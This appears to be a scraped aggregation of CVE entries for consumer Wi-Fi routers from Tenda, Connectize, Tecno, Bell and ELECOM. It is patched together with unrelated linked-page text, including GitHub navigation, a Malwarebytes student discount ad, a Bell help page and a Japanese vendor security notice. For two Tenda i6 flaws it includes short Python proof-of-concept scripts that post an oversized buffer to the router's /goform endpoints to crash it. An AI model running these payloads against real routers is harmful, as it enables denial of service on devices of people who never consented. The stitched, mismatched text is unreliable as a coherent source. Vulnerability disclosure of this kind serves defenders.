An issue was discovered on Connectize AC21000 G6 641.139.1.1256 allows attackers to run arbitrary commands via use of a crafted string in the ping utility.

CVE-2023-24046: Technical Advisory – Multiple Vulnerabilities in Connectize G6 AC2100 Dual Band Gigabit WiFi Router (CVE-2023-24046, CVE-2023-24047, CVE-2023-24048, CVE-2023-24049, CVE-2023-24050, CVE-2023-24051, CVE

Tenda i6 V1.0.0.8(3856) is vulnerable to Buffer Overflow via /goform/WifiMacFilterSet.

**Tenda APi6 V1.0.0.8(3856) Stack Overflow****Firmware information**

Manufacturer's address:https://www.tenda.com.cn/

Firmware download address: https://www.tenda.com.cn/download/detail-2570.html

**Affected Version****Vulnerability Details**

Vulnerability Location: /goform/WifiMacFilterSet

The length of the ndex parameter is not verified, sprintf can cause stack overflow vulnerability, it can result in dos attacks on routers.

The pages of the router

**POC**

import requests
from pwn import\*

ip \= "192.168.182.21" 
url \= "http://" + ip + "/goform/WifiMacFilterSet"
print(url)

payload \=b'a'\*0x3000

cookie \= {"Cookie":"user="}
data \= {"index": payload,"wl\_radio":0}
response \= requests.post(url, cookies\=cookie, data\=data)
print(response.text)
print("HackAttackSuccess!")

CVE-2023-48964: GitHub - daodaoshao/vul_tenda_i6_2

Tenda i6 V1.0.0.8(3856) is vulnerable to Buffer Overflow via /goform/wifiSSIDget.

**Tenda APi6 V1.0.0.8(3856) Stack Overflow****Firmware information**

Manufacturer's address:https://www.tenda.com.cn/

Firmware download address: https://www.tenda.com.cn/download/detail-2570.html

**Affected Version****Vulnerability Details**

Vulnerability Location: /goform/wifiSSIDget

The length of the ndex parameter is not verified, sprintf can cause stack overflow vulnerability, it can result in dos attacks on routers

The pages of the router

**POC**

import requests from pwn import\*

ip = "192.168.182.21" url = "http://" + ip + "/goform/wifiSSIDget" print(url)

payload =b'a'\*0x3000

cookie = {"Cookie":"user="} data = {"index": payload,"wl\_radio":0} response = requests.post(url, cookies=cookie, data=data) print(response.text) print("HackAttackSuccess!")

CVE-2023-48963: GitHub - daodaoshao/vul_tenda_i6_1

Tenda AC10 version US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via the shareSpeed parameter in the function fromSetWifiGuestBasic.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-45484: IOTvul/assets/fromSetWifiGuestBasic_code.png at master · l3m0nade/IOTvul

Stack Overflow vulnerability in Tenda AX1803 v.1.0.0.1 allows a remote attacker to execute arbitrary code via the ssid parameter in the function form_fast_setting_wifi_set.

CVE-2023-49044: IOT_VULN/Tenda/AX1803/form_fast_setting_wifi_set.md at main · Anza2001/IOT_VULN

Heap Overflow vulnerability in Tenda AX1803 v.1.0.0.1 allows a remote attacker to execute arbitrary code via the schedStartTime parameter or the schedEndTime parameter in the function setSchedWifi.

CVE-2023-49042: IOT_VULN/Tenda/AX1803/setSchedWifi.md at main · Anza2001/IOT_VULN

A vulnerability was found in Tecno 4G Portable WiFi TR118 TR118-M30E-RR-D-EnFrArSwHaPo-OP-V008-20220830. It has been declared as critical. This vulnerability affects unknown code of the file /goform/goform_get_cmd_process of the component Ping Tool. The manipulation of the argument url leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-246130 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-6304

We’ve got good news. Malwarebytes is now offering 50% off our products to students, wherever you are in the world.

Technology is now an indispensable part of student life, used for everything from socialising and calling home, to writing and researching essays. Unfortunately, that makes students taking their first steps into adult life a prime target for cybercrime.

But how can you be sure the Wi-Fi network you’re connecting to at your library or local coffee shop is safe? What about when you’re inside college walls? More than that, your social media accounts likely hold a lot of information about you, information you don’t want to get into the wrong hands.

It’s hard to know who to trust online, and one click on a dodgy link could lead to compromised accounts, identity theft or even malware.

And, as one student we spoke to said “Nothing is worse than losing a school essay”.

We know you need to protect yourself and your important files online, but we also know that you’re probably feeling strapped for cash at the moment.

We’ve got good news. Malwarebytes is now offering 50% off our products to students, wherever you are in the world.

Here’s what we can help with:

*   Protect your important essays from ransomware and other nasties with Premium Security
*   Help you shop online safer, with protection against infected ad and credit card skimmers in Browser Guard
*   Keep your identity safe and protect your social media accounts with Identity Theft Protection
*   Block trackers and ads with Browser Guard
*   Work safely in coffee shops, libraries and other public places with Privacy VPN
*   Game faster and in peace while staying protected by using Play mode to suspend notifications

Find out more and see pricing on our student discount page.

 Student discount: Get 50% off Malwarebytes 

An issue was discovered on Bell HomeHub 3000 SG48222070 devices. There is XSS related to the email field and the login page.

The Access control feature of your Home Hub lets 1000 you set the time and day a particular device can access the Internet. It blocks all Internet features, including email, social messaging or Skype.

There are two ways you can control access to the Internet:

1.  Create a schedule for specific devices
2.  Always block a device

As an example, you can limit the time your children spend online by specifying a day and time when their device (laptop, tablet, etc.) cannot access the Internet.

Access control only blocks Internet connections; it will not prevent devices from accessing other devices on the local network (e.g. , network printers, local file sharing between devices).  
For a Home Hub  2000 modem and above, manage Access control with the Bell Wi-Fi app.

CVE-2020-11448: Access control in the Home Hub modems : What is Access control

Inadequate encryption strength vulnerability in multiple routers provided by ELECOM CO.,LTD. and LOGITEC CORPORATION allows a network-adjacent unauthenticated attacker to guess the encryption key used for wireless LAN communication and intercept the communication. As for the affected products/versions, see the information provided by the vendor under [References] section.

**セキュリティ情報**

*   セキュリティ情報

平素は格別のご高配を賜り、厚く御礼申し上げます。  
当社製の無線LANルーターなどネットワーク製品の一部において、以下の脆弱性が判明いたしました。  
製品型番により対策内容が異なるため、お持ちの製品をご確認いただき対象であった場合は、安全なネットワーク環境を維持するため、速やかに対策の実施をお願いいたします。

今後も当社では新たな脆弱性問題が発生した際には、速やかに公表のうえ対策を行ってまいります。  
この度は、お客様にご迷惑をおかけしますことを深くお詫び申し上げます。何卒ご理解とご協力のほどお願いいたします。

**対象製品と対処方法**

（１）対策済みのファームウェアにアップデートが必要な製品

**脆弱性内容：**悪意のあるものにログインされると、任意のコマンドが実行される可能性があります。  
**対処方法：**対策済みのファームウェアにアップデートすることで、問題を回避することができます。

◀テーブルはスクロールできます

**脆弱性内容：**工場出荷時のWi-Fi初期パスワードが推測され、悪意のあるものに利用される可能性があります。  
**対処方法：**Wi-Fiパスワードが初期状態の場合は、推測の難しい堅牢なパスワードに変更してください。

◀テーブルはスクロールできます

対象製品

Wi-Fiパスワード変更方法

関連情報

WRC-2533GHBK2-T

えれさぽ文書番号：7377

JVNVU#94119876

WRC-2533GHBK-I

WRC-1167GHBK

WRC-733GHBK

WRC-733GHBK-I

WRC-733GHBK-C

WRC-300GHBK2-I

WRC-300GHBK

WRH-300WH-H

えれさぽ文書番号：11027

WRH-300BK2-S

WRH-300WH2-S

WRH-150BK

WRH-150WH

LAN-WH300NDGPE

えれさぽ文書番号：4671

**参考情報**

*   このリリースに掲載されている会社名・製品名等は、一般に各社の商標又は登録商標です。
*   このリリースに記載の内容は、発表当時の情報です。 予告なく変更されることがありますので、あらかじめご了承ください。
*   プレス用にエレコム製品の画像をご希望の方は、画像データベースシステムをご利用ください。

Tag

#wifi